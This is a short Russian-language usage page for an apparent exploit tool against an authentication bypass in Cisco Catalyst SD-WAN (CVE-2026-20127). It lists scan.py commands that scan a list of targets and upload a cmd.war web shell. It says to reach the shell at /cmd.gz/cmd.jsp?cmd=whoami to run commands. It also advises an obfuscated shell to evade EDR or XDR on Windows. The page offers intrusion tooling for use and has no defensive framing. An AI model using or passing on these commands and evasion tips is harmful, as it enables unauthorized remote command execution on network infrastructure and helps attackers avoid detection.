
Эксплойт уязвимости обхода аутентификации Cisco Catalyst SD-WAN (CVE-2026-20127)
Эксплойт для уязвимости обхода аутентификации Cisco Catalyst SD-WAN (CVE-2026-20127)
python scan.py -f targets.txt
python scan.py -f targets.txt -v
python scan.py -f targets.txt -t 10 -o vulnerable.txt
python scan.py -f targets.txt -w cmd.war
python scan.py -f targets.txt -w cmd.war t 10 -o vulnerable.txt
После успешного воспроизведения уязвимости перейдите по адресу /cmd.gz/cmd.jsp?cmd=whoami — результат отобразится на странице
Если необходимо заменить на веб-шелл, создайте WAR-пакет самостоятельно (рекомендуется использовать обфусцированный шелл, так как по результатам тестирования в системах Windows могут присутствовать EDR или XDR)